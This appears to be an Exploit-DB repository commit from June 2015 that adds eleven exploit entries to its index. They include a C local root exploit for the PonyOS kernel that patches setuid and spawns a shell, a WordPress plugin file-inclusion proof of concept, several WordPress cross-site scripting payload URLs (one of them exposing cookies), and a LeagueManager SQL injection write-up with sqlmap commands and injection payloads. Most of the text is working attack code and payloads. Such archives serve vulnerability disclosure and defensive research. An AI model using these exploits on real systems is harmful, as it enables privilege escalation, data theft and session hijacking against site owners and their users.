DB: 2015-06-03

11 new exploits

files.csv

@@ -33353,6 +33353,7 @@ id,file,description,date,author,platform,type,port
 36949,platforms/php/webapps/36949.txt,"Xeams <= 4.5 Build 5755 - Multiple Vulnerabilities",2015-05-08,"Marlow Tannhauser",php,webapps,5272
 36950,platforms/php/webapps/36950.txt,"Syncrify Server <= 3.6 Build 833 - Multiple Vulnerabilities",2015-05-08,"Marlow Tannhauser",php,webapps,5800
 36951,platforms/php/webapps/36951.txt,"SynaMan <= 3.4 Build 1436 - Multiple Vulnerabilities",2015-05-08,"Marlow Tannhauser",php,webapps,0
+36952,platforms/php/webapps/36952.txt,"Wordpress N-Media Website Contact Form with File Upload 1.5 - Local File Inclusion",2015-05-08,T3N38R15,php,webapps,0
 36953,platforms/php/webapps/36953.txt,"SynTail <= 1.5 Build 566 - Multiple Vulnerabilities",2015-05-08,"Marlow Tannhauser",php,webapps,0
 36954,platforms/php/webapps/36954.txt,"WordPress Yet Another Related Posts Plugin <= 4.2.4 - CSRF Vulnerability",2015-05-08,Evex,php,webapps,80
 36955,platforms/osx/remote/36955.py,"MacKeeper URL Handler Remote Code Execution",2015-05-08,"Braden Thomas",osx,remote,0
@@ -33552,3 +33553,13 @@ id,file,description,date,author,platform,type,port
 37168,platforms/linux/local/37168.txt,"PonyOS <= 3.0 - ELF Loader Privilege Escalation",2015-06-01,"Hacker Fantastic",linux,local,0
 37171,platforms/hardware/remote/37171.rb,"D-Link Devices HNAP SOAPAction-Header Command Execution",2015-06-01,metasploit,hardware,remote,0
 37172,platforms/hardware/webapps/37172.txt,"Aruba ClearPass Policy Manager Stored XSS",2015-06-01,"Cristiano Maruti",hardware,webapps,0
+37173,platforms/php/webapps/37173.txt,"Download Monitor 3.3.5.4 'uploader.php' Multiple Cross Site Scripting Vulnerabilities",2012-05-15,"Heine Pedersen",php,webapps,0
+37174,platforms/php/webapps/37174.txt,"WordPress Network Publisher 5.0.1 'networkpub_key' Cross Site Scripting Vulnerability",2012-05-15,"Heine Pedersen",php,webapps,0
+37175,platforms/php/webapps/37175.txt,"Download Manager 2.2.2 'cid' Parameter Cross Site Scripting Vulnerability",2012-05-15,"Heine Pedersen",php,webapps,0
+37176,platforms/php/webapps/37176.txt,"PDF & Print Button Joliprint 1.3.0 Multiple Cross Site Scripting Vulnerabilities",2012-05-15,"Heine Pedersen",php,webapps,0
+37177,platforms/php/webapps/37177.txt,"CataBlog WordPress Plugin 1.6 'admin.php' Cross Site Scripting Vulnerability",2012-05-15,"Heine Pedersen",php,webapps,0
+37178,platforms/php/webapps/37178.txt,"2 Click Social Media Buttons 0.32.2 Multiple Cross Site Scripting Vulnerabilities",2012-05-15,"Heine Pedersen",php,webapps,0
+37179,platforms/php/webapps/37179.txt,"iFrame Admin Pages 0.1 'main_page.php' Cross Site Scripting Vulnerability",2012-05-15,"Heine Pedersen",php,webapps,0
+37180,platforms/php/webapps/37180.txt,"WordPress Newsletter Manager Plugin 1.0 Multiple Cross Site Scripting Vulnerabilities",2012-05-15,"Heine Pedersen",php,webapps,0
+37182,platforms/php/webapps/37182.txt,"WordPress LeagueManager 3.9.11 Plugin - SQLi",2015-06-02,javabudd,php,webapps,0
+37183,platforms/linux/local/37183.c,"PonyOS <= 3.0 - tty ioctl() Local Kernel Exploit",2015-06-02,"Hacker Fantastic",linux,local,0

platforms/linux/local/37183.c

@@ -0,0 +1,47 @@
+# Exploit Title: PonyOS <= 3.0 tty ioctl() local kernel exploit
+# Google Dork: [if applicable]
+# Date: 29th June 2015
+# Exploit Author: HackerFantastic
+# Vendor Homepage: www.ponyos.org
+# Software Link: [download link if available]
+# Version: [app version] PonyOS <= 3.0
+# Tested on: PonyOS 3.0
+# CVE : N/A
+
+# Source: https://raw.githubusercontent.com/HackerFantastic/Public/master/exploits/applejack.c
+
+/* PonyOS <= 3.0 tty ioctl() root exploit
+  ========================================
+  PonyOS 0.4.99-mlp had two kernel vulnerabilities
+  disclosed in April 2013 that could be leveraged 
+  to read/write arbitrary kernel memory. This is 
+  due to tty winsize ioctl() allowing to read/write
+  arbitrary memory. This exploit patches the setuid
+  system call to remove a root uid check allowing
+  any process to obtain root privileges. 
+
+  John Cartwright found these flaws and others here:
+  https://www.exploit-db.com/exploits/24933/
+
+  Written for educational purposes only. Enjoy!  
+
+   -- prdelka
+
+*/
+#include <stdio.h>
+#include <stdlib.h>
+#include <sys/ioctl.h>
+
+int main(){
+	struct winsize ws;
+	printf("[+] PonyOS <= 3.0 ioctl() local root exploit\n");
+	memcpy(&ws,"\x90\x90\x90\x90\x8b\x45\x08\x89",8);
+	ioctl(0, TIOCSWINSZ, &ws);
+	ioctl(0, TIOCGWINSZ, (void *)0x0010f101);
+	printf("[-] patched sys_setuid()\n");
+	__asm("movl $0x18,%eax");
+	__asm("xorl %ebx,%ebx");
+	__asm("int $0x7F");
+	printf("[-] Got root?\n");
+	system("/bin/sh");
+}

platforms/php/webapps/36952.txt

@@ -0,0 +1,27 @@
+# Exploit Title: website contact form with file upload 1.5 Exploit Local File Inclusion
+# Google Dork: inurl:"/plugins//website-contact-form-with-file-upload/"
+# Date: 07.05.2015
+# Exploit Author: T3N38R15
+# Software Link: https://wordpress.org/plugins/website-contact-form-with-file-upload/
+# Version: 1.5
+# Tested on: Windows/Linux
+
+The affected file is /wp-content/plugins/website-contact-form-with-file-upload/lib/wide-image/image-processor.php
+it include the file /wp-content/plugins/website-contact-form-with-file-upload/lib/wide-image/helpers/demo.php
+and at the line 23-26 are the inclusion.
+
+
+			$file = LIB_PATH . '/filters/' . $name . '.php';
+			if (!file_exists($file))
+				throw new Exception("Invalid demo: {$name}");
+			include($file);
+
+
+The exploit can be used like that : /wp-content/plugins/website-contact-form-with-file-upload/lib/wide-image/image-processor.php?demo=../test
+This version would include the test.php file in the same directory because we need to back navigate from the directory ./filters/../test.php
+Now we can include all php files on the system.
+
+Proof of concept : http://localhost/wp-content/plugins/website-contact-form-with-file-upload/lib/wide-image/image-processor.php?demo=../test
+
+Greets to Team Madleets/leets.pro
+Regards T3N38R15

platforms/php/webapps/37173.txt

@@ -0,0 +1,11 @@
+source: http://www.securityfocus.com/bid/53514/info
+
+The Download Monitor plugin for WordPress is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+Download Monitor 3.3.5.4 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/wp-content/plugins/download-monitor/uploader.php?tab=addtags="><script>alert(1)</script>
+http://www.example.com/wp-content/plugins/download-monitor/uploader.php?tab=addthumbnail="><script>alert(1)</script>
+http://www.example.com/wp-content/plugins/download-monitor/uploader.php?tab=downloads&s=%22%3E%3Cscript%3Ealert%281%29%3C/script%3E 

platforms/php/webapps/37174.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/53516/info
+
+Network Publisher plugin for WordPress is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+Network Publisher 5.0.1 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/wp-admin/plugins.php?page=networkpub 

platforms/php/webapps/37175.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/53517/info
+
+The Download Manager plugin for WordPress is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+Download Manager 2.2.2 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/wp-admin/admin.php?page=file-manager/categories&cid=%22%3E%3Cscript%3Ealert%281%29%3C/script%3E 

platforms/php/webapps/37176.txt

@@ -0,0 +1,11 @@
+source: http://www.securityfocus.com/bid/53519/info
+
+PDF & Print Button Joliprint plugin for WordPress is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+PDF & Print Button Joliprint 1.3.0 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/wp-admin/options-general.php?page=joliprint/joliprint_admin_options.php&opt=%22%3E%3Cscript%3Ealert%281%29%3C/script%3E
+
+http://www.example.com/wp-content/plugins/joliprint/joliprint_options_upload.php?type=%3C/script%3E%3Cscript%3Ealert(1);%3C/script%3E 

platforms/php/webapps/37177.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/53520/info
+
+CataBlog plugin for WordPress is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+CataBlog 1.6 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/wp-admin/admin.php?page=catablog-gallery&category="><script>alert(1)</script> 

platforms/php/webapps/37178.txt

@@ -0,0 +1,11 @@
+source: http://www.securityfocus.com/bid/53521/info
+
+The 2 Click Social Media Buttons plugin for WordPress is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+2 Click Social Media Buttons 0.32.2 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/wp-content/plugins/2-click-socialmedia-buttons/libs/pinterest.php?pinterest-url=%22%3E%3Cscript%3Ealert%281%29%3C/script%3E&pinterest-description=1
+
+http://www.example.com/wp-content/plugins/2-click-socialmedia-buttons/libs/xing.php?xing-url=%22%3E%3C/script%3E%3Cscript%3Ealert%281%29%3C/script%3E 

platforms/php/webapps/37179.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/53522/info
+
+The iFrame Admin Pages plugin for WordPress is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+iFrame Admin Pages 0.1 is vulnerable; other versions may also be affected.
+
+http://www.example.com/wp-content/plugins/iframe-admin-pages/main_page.php POST DATA: url="><script>alert(1)</script>&newiframe=new&servicerequest=new

platforms/php/webapps/37180.txt

@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/53523/info
+
+Newsletter Manager plugin for WordPress is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input before using it in dynamically generated content.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and to launch other attacks. 
+
+http://www.example.com/wp-admin/admin.php?page=newsletter-manager-emailcampaigns&action=test_mail&id=1&pageno=1&id="><script>alert(document.cookie);</script> 

platforms/php/webapps/37182.txt

@@ -0,0 +1,95 @@
+###################################################################################################
+# Exploit Title: WordPress LeagueManager SQLi
+# Version: 3.9.11
+# Vendor: https://wordpress.org/plugins/leaguemanager
+# Software Link: 
+https://downloads.wordpress.org/plugin/leaguemanager.3.9.1.1.zip
+# Author: javabudd
+# Date: 06/01/2015
+# Tested on: Linux | Windows
+###################################################################################################
+
+Vulnerabilities (2)
+==========================
+
+(1) Unauthenticated SQLi [CWE-89]
+
+CODE:
+lib/core.php (785)
+++++++++++++++++++++++++++
+function getMatch() is passed an unsanitized $match_id parameter to the 
+SQL query
+++++++++++++++++++++++++++
+
+POC:
+http://localhost/?match=1
+
+SQLMap
+++++++++++++++++++++++++++
+python sqlmap.py --url "http://localhost/?match=1" --level 5 --risk 3 
+--dbms mysql
+++++++++++++++++++++++++++
+---
+Parameter: match (GET)
+Type: boolean-based blind
+Title: AND boolean-based blind - WHERE or HAVING clause
+Payload: match=1 AND 3991=3991
+
+Type: error-based
+Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP 
+BY clause
+Payload: match=1 AND (SELECT 8344 FROM(SELECT 
+COUNT(*),CONCAT(0x7178717671,(SELECT 
+(ELT(8344=8344,1))),0x717a707a71,FLOOR(RAND(0)*2))x FROM 
+INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
+
+Type: AND/OR time-based blind
+Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
+Payload: match=1 AND (SELECT * FROM (SELECT(SLEEP(5)))LCcI)
+
+Type: UNION query
+Title: Generic UNION query (NULL) - 20 columns
+Payload: match=-9496 UNION ALL SELECT 
+NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7178717671,0x4945496f7a7062675158,0x717a707a71),NULL--
+---
+[02:18:52] [INFO] the back-end DBMS is MySQL
+web application technology: PHP 5.5.20, Apache 2.4.10
+back-end DBMS: MySQL 5.0
+
+(2) Unauthenticated SQLi [CWE-89]
+
+Code:
+lib/core.php (486)
+++++++++++++++++++++++++++
+function getLeague() is passed an unsanitized $league_id parameter from 
+the constructor
+++++++++++++++++++++++++++
+
+POC:
+http://localhost?season=1&league_id=1&match_day=1&team_id=1
+
+SQLMAP
+++++++++++++++++++++++++++
+python sqlmap.py --url 
+"http://localhost?season=1&league_id=1&match_day=1&team_id=1" --dbms 
+mysql --level 5 --risk 3 -p league_id
+++++++++++++++++++++++++++
+---
+Parameter: league_id (GET)
+     Type: error-based
+     Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or 
+GROUP BY clause (EXTRACTVALUE)
+     Payload: season=1&league_id=1' AND 
+EXTRACTVALUE(4330,CONCAT(0x5c,0x7178717671,(SELECT 
+(ELT(4330=4330,1))),0x717a707a71)) AND 'SOeQ'='SOeQ&match_day=1&team_id=1
+
+     Type: AND/OR time-based blind
+     Title: MySQL <= 5.0.11 AND time-based blind (heavy query)
+     Payload: season=1&league_id=1' AND 
+9638=BENCHMARK(5000000,MD5(0x54624c4e)) AND 
+'GmZI'='GmZI&match_day=1&team_id=1
+---
+[03:31:55] [INFO] the back-end DBMS is MySQL
+web application technology: PHP 5.5.20, Apache 2.4.10
+back-end DBMS: MySQL 5.1
+